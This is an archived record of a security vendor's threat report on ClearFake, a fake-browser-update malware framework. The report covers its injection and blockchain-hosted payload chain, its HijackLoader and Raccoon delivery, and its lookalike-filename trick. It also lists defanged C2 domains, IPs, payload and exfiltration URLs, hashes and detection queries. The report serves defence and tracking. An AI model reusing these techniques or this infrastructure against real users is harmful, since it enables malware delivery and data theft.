{ "id": "aab0bd3b-b154-4232-9274-7181e465bbae", "created_at": "2026-04-06T00:08:32.871775Z", "updated_at": "2026-04-10T03:33:16.487965Z", "deleted_at": null, "sha1_hash": "6057a7a4bcc8a5aec64087c5078152e485cc42f6", "title": "ClearFake: a newcomer to the “fake updates” threats landscape", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3355129, "plain_text": "ClearFake: a newcomer to the “fake updates” threats landscape\r\nBy Quentin Bourgue\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2023-10-16 · Archived: 2026-04-05 23:04:00 UTC\r\nClearFake is a new malicious JavaScript framework deployed on compromised websites to deliver further\r\nmalware using the drive-by download technique. This blogpost aims at presenting a technical analysis of the\r\nClearFake installation flow, the malware delivered by ClearFake, the C2 infrastructure and tracking opportunities.\r\nTable of contents\r\nIntroduction\r\nClearFake installation flow\r\nInjected JavaScript code\r\nNext stage JavaScript payloads\r\nFake update web page\r\nMalware delivered by ClearFake\r\nSuspicious filename\r\nAPPX file\r\nOverview of HijackLoader\r\nClearFake C2 infrastructure and tracking opportunities\r\nClearFake C2 communications\r\nPivot on IP addresses\r\nConclusion\r\nClearFake IoCs \u0026 Technical Details\r\nIoCs\r\nClearFake C2 domains\r\nClearFake IP addresses\r\nClearFake infection chain\r\nMITRE ATT\u0026CK TTPs\r\nAnnexes\r\nAnnex 1 – Injected Javascript codes\r\nAnnex 2 – Next stage payloads\r\nExternal references\r\nIntroduction\r\nOn 26 August 2023, cybersecurity researcher Randy McEoin published1 an analysis of a new malicious\r\nJavaScript framework deployed on compromised websites to deliver further malware using the drive-by\r\ndownload technique. The newly discovered malware was named ClearFake due to the clear text JavaScript\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 1 of 20\n\ninjected into the compromised website, which was not obfuscated in the early version as is usually the case for\r\nJavascript malware.\r\nClearFake is another “fake updates” threat leveraging social engineering to trick the user into running a\r\nfake web browser update, as for SocGholish and FakeSG malware. By linking the “fake updates” lure to the\r\nwatering hole technique, ClearFake operators target a wide range of users and conduct effective, scalable\r\nmalware distribution campaigns.\r\nFrom our telemetry and customers’ feedback, we observed an increasing number of communications to ClearFake\r\ninfrastructure at the end of September 2023. At the same time, we identified several hundred websites injected by\r\nClearFake.\r\nSekoia.io’s Threat \u0026 Detection Research (TDR) team investigated this emerging threat and shares in this blog post\r\nour analysis of ClearFake, the malware delivered, as well as tracking opportunities.\r\nClearFake installation flow\r\nHere is an overview of the infection chains’ stages observed distributing commodity malware via ClearFake:\r\nClearFake installation flow, as of 30 September 2023\r\nFigure 1. ClearFake installation flow, as of 30 September 2023 (Click on the image for a better view)\r\nInjected JavaScript code\r\nClearFake operators compromised WordPress sites, acting as water holes, to inject malicious JavaScript code into\r\nthe HTML page.\r\nIn the early ClearFake version, the injected code was base64-encoded JavaScript from a data-url attribute,\r\ndownloading another JavaScript payload from an attacker-owned domain (brewasigfi1978.workers[.]dev) and\r\nexecuting it using the eval() function, e.g.:\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 2 of 20\n\nSince 28 September 2023, to download the next stage, ClearFake have used a different technique, relying on\r\nsmart contract from the Binance Smart Chain. The result value of the requested smart contract contains an\r\nobfuscated JavaScript, encoded in base64 and converted in hexadecimal.\r\nAnnex 1 includes the obfuscated and deobfuscated injected JavaScript used prior to and after 28 September 2023,\r\nas well as an example of the response of the smart contract.\r\nNext stage JavaScript payloads\r\nThe first payload is an obfuscated JavaScript aiming at downloading and executing the second payload. Here is an\r\nexample of the deobfuscated JavaScript using deobfuscate.io:\r\nThe first obfuscated payload is available in Annex 2.\r\nThe second payload is a clear-text JavaScript creating an iframe element to host the fake update interface and\r\nto cover the entire document object model (DOM) of the web documents, setting:\r\nthe iframe width and height to 100%;\r\nthe z-index, an attribute specifying the stack order of the element, to 99999999999.\r\nIt then downloads the fake update interface. Here is an example of the second payload:\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 3 of 20\n\nThe third payload is an HTML page serving as a fake update interface and downloading the fake update content\r\nfor the appropriate web browser. An example of the third payload is provided in Annex 2.\r\nThe HTML page downloads the final fake update page (HTML) from the URL path stored in the HTML element\r\nhref and modified using the decoded value of the Javascript variable blank, e.g.\r\n“/lander/firefox_1695214415/_index.php”.\r\nHere is an example of the source code of the fake update page on urlscan:\r\nhttps://urlscan.io/responses/a70b72efd8cd83f2b79cc9b9823112930e8ffa49edeb6bb5d2b1bbcabccefafb/\r\nFake update web page\r\nThe fake update page displays a realistic copy of the web browser download page for Chrome, Edge and Firefox,\r\nas shown in the following figure.\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 4 of 20\n\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 5 of 20\n\nFigure 2. ClearFake fake update pages for Chrome, Edge and Firefox web browsers\r\nIt also contains JavaScript code aiming at fingerprinting the victims’ web browser and initiating the download\r\nmodule. Here is an overview of the executing capabilities of the fake update page:\r\nImport the jQuery library used by the following Javascript;\r\nDefine the infamous module named FingerprintJS2 aiming at generating unique fingerprints for browsers\r\nbased on various attributes and features. The module contains mathematical, fingerprint generation, utility,\r\nfeature detection functions, as well as audio and font fingerprinting;\r\nSet the JavaScript onclick event for the download button;\r\nDefine functions related to handling cookies and extracting values from the URL parameters;\r\nGenerate the visitor fingerprint and exfiltrate it to “hxxps://stats-best[.]site/fp.php”;\r\nGenerate the download URL using “_lp”, “FPID”, “DownloadMouse”, “D” and “_token” parameters when\r\nthe onclick event is executed.\r\nMalware delivered by ClearFake\r\nOn 30 September 2023, Sekoia.io analysts ran the infection chain until retrieving the final payload downloaded by\r\nthe victim.\r\nSuspicious filename\r\nFor Microsoft Edge’s visitors, ClearFake delivered a malicious Windows Application Packaging Project (APPX\r\nfile) from Dropbox.\r\nThe payload’s name “MlсrоsоftЕdgеSеtup.appx” is a masquerading of the legitimate Microsoft Edge installer and\r\nuses UTF-8 Cyrillic character for the characters “c”, “e”, “o” and “E”. Escaping unicode characters returns the\r\nfollowing result:\r\nMl\\u0441r\\u043Es\\u043Eft\\u0415dg\\u0435S\\u0435tup.appx\r\nASCII Unicode Name\r\nс \\u0441 Cyrillic Small Letter Es\r\ne \\u0435 Cyrillic Small Letter Ie\r\nо \\u043E Cyrillic Small Letter O\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 6 of 20\n\nЕ \\u0415 Cyrillic Capital Letter Ie\r\nCyrillic characters are invisible to the user. Sekoia.io assess with high confidence that the use of lookalike\r\ncharacters aims at avoiding static detection patterns based on the filename, without raising the potential\r\nvictim’s suspicions.\r\nIt is interesting to note that SocGholish operators successfully leveraged this technique in 2022, as identified\r\nby Red Canary3. As this obfuscation method is not widely used, it is legitimate to ask ourselves if the SocGholish\r\noperators are also behind the new ClearFake malware.\r\nAPPX file\r\nWindows Apps are ZIP archive files that store executable files and other additional ones including XML\r\n(AppxManifest.xml and AppxBlockMap.xml), P7X (AppxSignature.p7x), as well as other optional files and\r\nrepositories.\r\nThe APPX file delivered by ClearFake (MD5: a7900cdbb2912d76aa6329c5c41d8609) is signed by “STECH\r\nCONSULTANCY LIMITED” and contains in particular the following executables:\r\n\\MlсrоsоftЕdgеSеtup\\AI_STUBS\\AiStubX64.exe (MD5: e89f448e8f41a590c51d34948bdc9c1e)\r\n\\MlсrоsоftЕdgеSеtup\\VFS\\AppData\\.exe (MD5: d113b3debc7e0a2da4369dd8d1dbad53)\r\nOnce executed, the Windows App reads the APPX manifest’s entry point containing the AiStubX64 executable and\r\nthen executes it. The AiStubX64.exe process copies the KSPSService executable located in the Virtual File\r\nSystem (VFS) and then launches it. The payload (KSPSService.exe) deployed by the APPX file turned out to\r\nbe a sample of HijackLoader. More technical information on this execution flow can be found in the Microsoft\r\ndocumentation4 and FINSIN’s analysis5.\r\nThe APPX file also contains a legitimate Microsoft Edge installer (MicrosoftEdgeUpdateSetup.exe MD5:\r\n58d8d75b0ca5e316862ed81cdb2d0c67) and a PowerShell script (chrome.ps1 MD5:\r\nbfe16fc5d100757bd9dec4ef1aa42913), downloading a legitimate Edge installer from transfer[.]sh and executing\r\nit. Both codes are executed when the user runs the Windows App file. Sekoia.io analysts believe that installing the\r\nlegitimate web browser alongside the malware once again avoids any suspicion from the victim.\r\nAs mentioned by SentinelOne6, APPX files are regularly used in malware campaigns to deploy the payload on the\r\ninfected host, including BazarBackdoor, Emotet or Magniber ransomware. Although this technique is not new,\r\nSekoia.io believes its use improves the rate of successful compromise by reducing the detection of the\r\nmalicious payload’s execution.\r\nOverview of HijackLoader\r\nFirst observed in the wild in July 2023 by Zscaler ThreatLabz7, HijackLoader is a modular loader downloading\r\nand executing an obfuscated payload. It implements several evasion techniques, including code injection, use of\r\nsyscalls, Windows API hashing and Heaven’s gate. In recent months, HijackLoader delivered numerous\r\ncommodity malware, including Danabot, Lumma, Raccoon, Redline, Remcos, SystemBC and Vidar.\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 7 of 20\n\nOnce executed, the HijackLoader sample deployed through the APPX file downloads its obfuscated payload from\r\nthe adversary infrastructure “hxxps://server2-slabx.ocmtancmi2c5t[.]live/osmesis/1829973585.png”. The payload\r\nloaded by HijackLoader is a Raccoon sample communicating with its Command \u0026 Control (C2) server\r\n“128.140.101[.]125”.\r\nIn August 2023, Rapid7 observed8 that the new IDAT Loader malware was delivered by ClearFake. Based on\r\nthe code similarities between IDAT Loader and HijackLoader, and given the overlap in the C2 infrastructures,\r\nSekoia.io assess with high confidence that the same threat group operates both loaders.\r\nClearFake C2 infrastructure and tracking opportunities\r\nClearFake C2 communications\r\nClearFake stages use hardcoded URLs to download the next stage payloads from its C2 infrastructure. URL\r\npatterns have not changed since the threat first appeared in July 2023.\r\nThe URLs observed on 30 September 2023 are:\r\nhxxps://ojhggnfbcy62[.]com/vvmd54/\r\nhxxps://ojhggnfbcy62[.]com/ZgbN19Mx\r\nhxxps://ojhggnfbcy62[.]com/lander/firefox_1695214415/_index.php\r\nBasic heuristics based on the URL pattern stem from the ClearFake C2 communications. Sekoia.io used similar\r\nqueries on urlscan:\r\npage.url:”/vvmd54/”\r\npage.url:”/ZgbN19Mx”\r\npage.url.keyword:/.*\\/lander\\/(chrome|firefox|edge).*\\/_index\\.php/\r\nUsing urlscan and other URL scanning search engines, we retrieved 39 domain names:\r\n921hapudyqwdvy[.]com\r\n98ygdjhdvuhj[.]com\r\nadqdqqewqewplzoqmzq[.]site\r\nbgobgogimrihehmxerreg[.]site\r\nboiibzqmk12j[.]com\r\nbookchrono8273[.]com\r\nborbrbmrtxtrbxrq[.]site\r\nbpjoieohzmhegwegmmuew[.]online\r\ncczqyvuy812jdy[.]com\r\newkekezmwzfevwvwvvmmmmmmwfwf[.]site\r\ngkrokbmrkmrxtmxrxr[.]space\r\nindogervo22tevra[.]com\r\nindogevro22tevra[.]com\r\nioiubby73b1n[.]com\r\noiuytyfvq621mb[.]org\r\nojhggnfbcy62[.]com\r\nomdowqind[.]site\r\nooinonqnbdqnjdnqwqkdn[.]space\r\nopkfijuifbuyynyny[.]com\r\nopmowmokmwczmwecmef[.]site\r\nowkdzodqzodqjefjnnejenefe[.]site\r\npklkknj89bygvczvi[.]com\r\npoqwjoemqzmemzgqegzqzf[.]online\r\npwwqkppwqkezqer[.]site\r\nreedx51mut[.]com\r\nsioaiuhsdguywqgyuhiqw[.]org\r\nsioaiuhsdguywqgyuhuiqw[.]org\r\nug62r67uiijo2[.]com\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 8 of 20\n\nkjniuby621edoo[.]com\r\nkomomjinndqndqwf[.]store\r\nlminoeubybyvq[.]com\r\nnbvyrxry216vy[.]com\r\nngvcfrttgyu512vgv[.]net\r\nnmbvcxzasedrt[.]com\r\noekofkkfkoeefkefbnhgtrq[.]space\r\noiouhvtybh291[.]com\r\noiqwbuwbwqznjqsdfsfqhf[.]site\r\noiuugyfytvgb22h[.]com\r\nvcrwtttywuuidqioppn1[.]com\r\nvvooowkdqddcqcqcdqggggl[.]site\r\nweomfewnfnu[.]site\r\nwffewiuofegwumzowefmgwezfzew[.]site\r\nwnimodmoiejn[.]site\r\nwsexdrcftgyy191[.]com\r\nytntf5hvtn2vgcxxq[.]com\r\nzasexdrc13ftvg[.]com\r\nziucsugcbfyfbyccbasy[.]com\r\nznqjdnqzdqzfqmfqmkfq[.]site\r\nPivot on IP addresses\r\nBy pivoting on the IP addresses resolving the previous attacker-owned domains, we listed the following C2\r\nservers that we assess with high confidence as being exclusively associated with the ClearFake infrastructure.\r\n109.248.206[.]49\r\n109.248.206[.]83\r\n109.248.206[.]101\r\n109.248.206[.]118\r\n109.248.206[.]196\r\n135.181.211[.]230\r\n5 of them belong to the autonomous system (AS) “YACOLO-AS” (AS203493) located in Russia, and the last one\r\nbelongs to the HETZNER AS (AS24940), favoured by numerous threat actors.\r\nFor all C2 servers, the common name (CN) of the TLS certificates exposed on port 443 is\r\n“921hapudyqwdvy.com”, allowing us to unveil the ClearFake infrastructure using scanning search engines, such as\r\nShodan or Censys. Sekoia.io used a similar query on Shodan to identify and proactively track the ClearFake C2\r\ninfrastructure:\r\nssl:”921hapudyqwdvy.com”\r\nClearFake operators run the Keitaro traffic distribution system (TDS) on C2 servers to protect their\r\ninfrastructure that hosts malicious content and to select the targeted traffic.\r\nTDR believes that ClearFake operators are likely to improve the stealth of malware C2 communication in\r\nthe near future. They could also harden their C2 server configuration, to prevent their infrastructure from being\r\nso easily illuminated.\r\nConclusion\r\nFirst seen in the wild in July 2023, ClearFake is another “fake updates” threat that quickly became\r\nwidespread due to the effective lure targeting a wide audience, as well as the watering hole technique used to\r\ndistribute the malware via numerous compromised websites.\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 9 of 20\n\nGiven the ongoing development and the use of cutting-edge techniques, such as the blockchain technology to\r\nstore malicious payloads, this threat must be closely monitored by organisations, as the malware delivered by\r\nClearFake can be used to gain access to the victim’s network.\r\nThe tactics, techniques and procedures leveraged by the ClearFake operators overlap with those of\r\nSocGholish ones (tracked as TA569), in particular the use of watering holes, “fake updates” lures, Keitaro TDS,\r\nDropbox file hosting service and the masquerading of filename with cyrillic characters. Considering this,\r\nSekoia.io further assess ClearFake and SocGholish are possibly operated by the same threat group.\r\nGathering additional evidence may help to confirm or refute this hypothesis.\r\nTo provide our customers with actionable intelligence, we will continue to monitor the evolution of ClearFake and\r\nother malware it delivers.\r\nClearFake IoCs \u0026 Technical Details\r\nIoCs\r\nThe list of IoCs is available on Sekoia.io github repository.\r\nClearFake C2 domains\r\n921hapudyqwdvy[.]com\r\n98ygdjhdvuhj[.]com\r\nadqdqqewqewplzoqmzq[.]site\r\nbgobgogimrihehmxerreg[.]site\r\nboiibzqmk12j[.]com\r\nbookchrono8273[.]com\r\nborbrbmrtxtrbxrq[.]site\r\nbpjoieohzmhegwegmmuew[.]online\r\nbrewasigfi1978[.]workers[.]dev\r\ncczqyvuy812jdy[.]com\r\newkekezmwzfevwvwvvmmmmmmwfwf[.]site\r\ngkrokbmrkmrxtmxrxr[.]space\r\nindogervo22tevra[.]com\r\nindogevro22tevra[.]com\r\nioiubby73b1n[.]com\r\nkjniuby621edoo[.]com\r\nkomomjinndqndqwf[.]store\r\nlminoeubybyvq[.]com\r\nnbvyrxry216vy[.]com\r\nngvcfrttgyu512vgv[.]net\r\nnmbvcxzasedrt[.]com\r\noekofkkfkoeefkefbnhgtrq[.]space\r\noiouhvtybh291[.]com\r\noiuytyfvq621mb[.]org\r\nojhggnfbcy62[.]com\r\nomdowqind[.]site\r\nooinonqnbdqnjdnqwqkdn[.]space\r\nopkfijuifbuyynyny[.]com\r\nopmowmokmwczmwecmef[.]site\r\nowkdzodqzodqjefjnnejenefe[.]site\r\npklkknj89bygvczvi[.]com\r\npoqwjoemqzmemzgqegzqzf[.]online\r\npwwqkppwqkezqer[.]site\r\nreedx51mut[.]com\r\nsioaiuhsdguywqgyuhiqw[.]org\r\nsioaiuhsdguywqgyuhuiqw[.]org\r\nstats-best[.]site\r\nug62r67uiijo2[.]com\r\nvcrwtttywuuidqioppn1[.]com\r\nvvooowkdqddcqcqcdqggggl[.]site\r\nweomfewnfnu[.]site\r\nwffewiuofegwumzowefmgwezfzew[.]site\r\nwnimodmoiejn[.]site\r\nwsexdrcftgyy191[.]com\r\nytntf5hvtn2vgcxxq[.]com\r\nzasexdrc13ftvg[.]com\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 10 of 20\n\noiqwbuwbwqznjqsdfsfqhf[.]site\r\noiuugyfytvgb22h[.]com\r\nziucsugcbfyfbyccbasy[.]com\r\nznqjdnqzdqzfqmfqmkfq[.]site\r\nClearFake IP addresses\r\n109.248.206[.]49\r\n109.248.206[.]83\r\n109.248.206[.]101\r\n109.248.206[.]118\r\n109.248.206[.]196\r\n135.181.211[.]230\r\nClearFake infection chain\r\nIoC Description\r\nhxxps://hello-world-broken-dust-1f1c.brewasigfi1978.workers[.]dev/\r\nDownload\r\nURL of the\r\nfirst\r\nJavaScript\r\npayload\r\nhxxps://ojhggnfbcy62[.]com/vvmd54/\r\nDownload\r\nURL of the\r\nsecond\r\nJavaScript\r\npayload\r\nhxxps://ojhggnfbcy62[.]com/ZgbN19Mx\r\nDownload\r\nURL of the\r\nfirst HTML\r\npayload\r\nhxxps://ojhggnfbcy62[.]com/lander/firefox_1695214415/index.php\r\nDownload\r\nURL of the\r\nsecond\r\nHTML\r\npayload\r\nhxxps://stats-best[.]site/fp.php\r\nC2 URL for\r\nthe\r\nfingerprinting\r\ndata\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 11 of 20\n\nIoC Description\r\nhxxp://ojhggnfbcy62[.]com/?\r\n_lp=1\u0026_token=uuid_1ubo22l1dqqlm_1ubo22l1dqqlm6518291d817043.55797095\r\nRedirect\r\nURL to the\r\nHijackLoader\r\npayload\r\n(APPX)\r\nhxxps://www.dropbox[.]com/e/scl/fi/6gtsp3qjf54lsec0piwvq/Ml-r-s-ft-dg-S-tup.appx?rlkey=hdm3apoi4n31v2rxruiosvtaa\u0026dl=1\r\nDownload\r\nURL of the\r\nHijackLoader\r\npayload\r\n(APPX)\r\nb583d86c4abc6d6ca57bde802b7e9d8143a249aed6a560a4626e79ae13f6209d\r\nHijackLoader\r\npayload\r\n(APPX)\r\nd60d4da2cfe120138a3fde66694b40ae2710cfc2af33cb7810b3a0e9b1663a4f\r\nHijackLoader\r\npaylaod\r\n(EXE)\r\nhxxps://server2-slabx.ocmtancmi2c5t[.]live/osmesis/1829973585.png\r\nHijackLoader\r\nhosting\r\npayload URL\r\nocmtancmi2c5t[.]live\r\nHijackLoader\r\nhosting\r\npayload\r\ndomain\r\n128.140.101[.]125\r\nRaccoon C2\r\nserver\r\nMITRE ATT\u0026CK TTPs\r\nTactic Technique\r\nResource Development T1584 – Compromise Infrastructure\r\nExecution T1059.007 – Command and Scripting Interpreter: JavaScript\r\nInitial Access T1189 – Drive-by Compromise\r\nDefense Evasion T1027 – Obfuscated Files or Information\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 12 of 20\n\nTactic Technique\r\nDefense Evasion T1132.001 – Data Encoding: Standard Encoding\r\nDefense Evasion T1036 – Masquerading\r\nDefense Evasion T1140 – Deobfuscate/Decode Files or Information\r\nCommand and Control T1041 – Exfiltration Over C2 Channel\r\nCommand and Control T1071.001 – Application Layer Protocol: Web Protocols\r\nCommand and Control T1105 – Ingress Tool Transfer\r\nAnnexes\r\nThe ClearFake scripts are available on Sekoia.io github repository.\r\nAnnex 1 – Injected Javascript codes\r\nInjected JavaScript used before 28 September 2023:\r\nThe script decodes to:\r\nInjected JavaScript used since 28 September 2023:\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 13 of 20\n\nThe script decodes to:\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 14 of 20\n\nResponse of the Binance Smart Chain:\r\nAnnex 2 – Next stage payloads\r\nFirst next stage payload downloaded by the injected JavaScript from the Binance Smart Chain:\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 15 of 20\n\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 16 of 20\n\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 17 of 20\n\nThe script decodes to:\r\nThird next stage payload serving as a fake update interface and downloading the fake update content:\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 18 of 20\n\nExternal references\r\n1. [Randy McEoin’s blog] ClearFake Malware Analysis ↩︎\r\n2. [NPM] @fingerprintjs/fingerprintjs ↩︎\r\n3. [Red Canary] Threat – SocGholish ↩︎\r\n4. [Microsoft Community Hub] Deploying local application data in a Desktop Bridge app with Advanced\r\nInstaller ↩︎\r\n5. [FINSIN] Infección en sitio web de e-commerce chileno ↩︎\r\n6. [SentinelOne] Inside Malicious Windows Apps for Malware Deployment ↩︎\r\n7. [Zscaler] Technical Analysis of HijackLoader ↩︎\r\n8. [Rapid7] Fake Update Utilizes New IDAT Loader To Execute StealC and Lumma Infostealers ↩︎\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 19 of 20\n\nThank you for reading this blogpost. We welcome any reaction, feedback or critics about this analysis. Please\r\ncontact us on tdr[at]sekoia.io.\r\nFeel free to read other TDR analysis here :\r\nShare\r\nCTI Cybercrime Malware\r\nShare this post:\r\nSource: https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nhttps://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/" ], "report_names": [ "clearfake-a-newcomer-to-the-fake-updates-threats-landscape" ], "threat_actors": [ { "id": "ebc139d2-7450-46f5-a9e4-e7d561133fa5", "created_at": "2024-04-24T02:00:49.453475Z", "updated_at": "2026-04-10T02:00:05.321256Z", "deleted_at": null, "main_name": "Mustard Tempest", "aliases": [ "Mustard Tempest", "DEV-0206", "TA569", "GOLD PRELUDE", "UNC1543" ], "source_name": "MITRE:Mustard Tempest", "tools": [ "SocGholish", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "3bf456e4-84ee-48fd-b3ab-c10d54a48a34", "created_at": "2024-06-19T02:03:08.096988Z", "updated_at": "2026-04-10T02:00:03.82859Z", "deleted_at": null, "main_name": "GOLD PRELUDE", "aliases": [ "Mustard Tempest ", "TA569 ", "UNC1543 " ], "source_name": "Secureworks:GOLD PRELUDE", "tools": [ "SocGholish" ], "source_id": "Secureworks", "reports": null }, { "id": "544cac23-af15-4100-8f20-46c07962cbfa", "created_at": "2023-01-06T13:46:39.484133Z", "updated_at": "2026-04-10T02:00:03.34364Z", "deleted_at": null, "main_name": "GOLD PRELUDE", "aliases": [ "TA569", "UNC1543" ], "source_name": "MISPGALAXY:GOLD PRELUDE", "tools": [ "FakeUpdates", "FakeUpdate", "SocGholish" ], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434112, "ts_updated_at": 1775791996, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6057a7a4bcc8a5aec64087c5078152e485cc42f6.pdf", "text": "https://archive.orkl.eu/6057a7a4bcc8a5aec64087c5078152e485cc42f6.txt", "img": "https://archive.orkl.eu/6057a7a4bcc8a5aec64087c5078152e485cc42f6.jpg" } }